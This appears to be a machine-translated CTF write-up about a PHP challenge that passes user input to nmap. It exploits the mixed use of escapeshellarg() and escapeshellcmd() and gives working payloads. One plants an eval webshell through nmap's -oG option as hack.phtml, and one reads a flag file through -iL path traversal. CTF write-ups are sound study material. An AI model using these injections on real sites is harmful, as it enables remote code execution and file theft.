WP

Two inspection points

1. Investigate nmap Use

2. Investigate escapeshellarg() And escapeshellcmd() Mixed use vulnerability

The first one is OK to say , The title tells

The second point , I do not know! , I don't know where I got it , Autistic ing

Look at other masters wp, Referred to the [BUUCTF 2018]Online Tool, A code audit question , It directly tells the parameter process escapeshellarg() And escapeshellcmd() Handle

The two questions cannot be said to be the same , Can only say exactly the same .

nmap Use output related parameters

stay nmap Chinese net The following results can be found in ：

-oN ( standard output )

-oX (XML Output )

-oS (ScRipT KIdd|3 oUTpuT)

-oG (Grep Output )

-oA ( Output to all formats )

There are other miscellaneous outputs , You can check it out , Here we use -oG structure payload

payload The subject is

<?php @eval($_POST["hack"]);?> -oG hack.php

However, echo after sending hacker word

There's a filter , Conduct fuzz test ,php The filtered , however phtml No, , And use php The short label of can replace <?php, That is to say ：

<?= @eval($_POST["hack"]);?> -oG hack.phtml

Not yet here , In this way parload after escapeshellarg() And escapeshellcmd() Function processing , Can't generate files

The solution is simple , Just add spaces and single quotes , In this way, it can produce a normal parsing php file

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

The specific principle is written by the boss PHP escapeshellarg()+escapeshellcmd() Regression of

stay CSDN There are other masters' writings on escapeshellarg() And escapeshellcmd() Analysis of , simple

Except for writing webshell, There are also direct reading methods , Take advantage of -iL Parameters

' -iL ../../../../flag -o a '

Direct access a Just go , The following can also be done , But to visit a’

' -iL ../../../../flag -o a

The reason is also those two functions .